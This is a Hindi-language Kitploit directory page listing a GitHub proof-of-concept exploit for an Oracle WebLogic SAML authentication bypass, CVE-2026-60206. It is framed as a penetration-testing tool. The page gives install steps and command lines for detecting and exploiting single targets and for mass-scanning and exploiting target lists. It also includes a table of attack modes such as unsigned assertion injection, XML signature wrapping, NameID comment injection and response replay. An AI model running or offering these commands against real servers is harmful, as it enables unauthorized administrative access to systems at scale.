Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
POC-CVE-2026-60206 — cve cve-2026-60206 weblogic saml exploit poc vulnerability oracle scanner security | Kitploit
उपकरण/GitHubGitHub/imbas007/poc-cve-2026-60206
प्रमाणीकरण और प्राधिकरणभेद्यता स्कैनरभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubimbas007/poc-cve-2026-60206

POC-CVE-2026-60206

cve cve-2026-60206 weblogic saml exploit poc vulnerability oracle scanner security

रिपॉजिटरी देखें
32951 महीना पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-60206 — Oracle WebLogic SAML प्रमाणीकरण बायपास

CVE CVSS

CVSS 9.9 — Oracle WebLogic Server Core में SAML प्रमाणीकरण बायपास।
प्रभावित: 12.2.1.4.0 14.1.1.0.0 14.1.2.0.0 15.1.1.0.0

⚠️ केवल अधिकृत सुरक्षा परीक्षण।


स्थापना

root@kitploit:~
git clone https://github.com/imbas007/CVE-2026-60206.git
cd CVE-2026-60206
pip install -r requirements.txt

उपयोग

एकल लक्ष्य

root@kitploit:~
# Detect version + SAML endpoints
python3 CVE-2026-60206-exploit.py -t https://target:7002 --detect

# Full exploit (all attack vectors)
python3 CVE-2026-60206-exploit.py -t https://target:7002 --mode all -u weblogic

# Specific mode
python3 CVE-2026-60206-exploit.py -t https://target:7002 --mode combo -u admin -v

# With proxy
python3 CVE-2026-60206-exploit.py -t https://target:7002 --mode all --proxy http://127.0.0.1:8080 --no-verify

मास स्कैन

root@kitploit:~
# Detect only
python3 CVE-2026-60206-exploit.py -l targets.txt -o results.json

# Detect + exploit (faster)
python3 CVE-2026-60206-exploit.py -l targets.txt --exploit --no-verify -T 30 -o results.json

# Single URL mass mode
python3 CVE-2026-60206-exploit.py -l https://target:7002 --exploit

टारगेट्स फ़ाइल (प्रति पंक्ति एक):

root@kitploit:~
192.168.1.100:7002
https://10.0.0.50
example.com

आक्रमण मोड सूचीबद्ध करें

root@kitploit:~
python3 CVE-2026-60206-exploit.py --list-modes

आक्रमण मोड


परियोजना संरचना

root@kitploit:~
CVE-2026-60206/
├── CVE-2026-60206-exploit.py   # Main script (single + mass)
├── mass_scan.py                # Mass scanner module
├── modules/
│   ├── samlib.py               # SAML manipulation (XSW, NameID, etc.)
│   ├── weblogic_client.py      # WebLogic HTTP client
│   └── logger.py               # Colored logging
├── requirements.txt
└── README.md

संदर्भ

  • Oracle July 2026 CPU
  • NVD: CVE-2026-60206
  • WebLogic SAML CVE-2018-2933 & CVE-2018-2998
टूल डाउनलोड करें
ModeDescription
unsignedअहस्ताक्षरित SAML assertion इंजेक्शन
xswXML सिग्नेचर रैपिंग (4 प्रकार)
nameidNameID हेरफेर / कमेंट इंजेक्शन
comboसंयुक्त: XSW + Unsigned + NameID ⭐
audienceAudienceRestriction बायपास
conditionsसमय/वैधता प्रतिबंध बायपास
replaySAML प्रतिक्रिया रीप्ले
allसब कुछ चलाएँ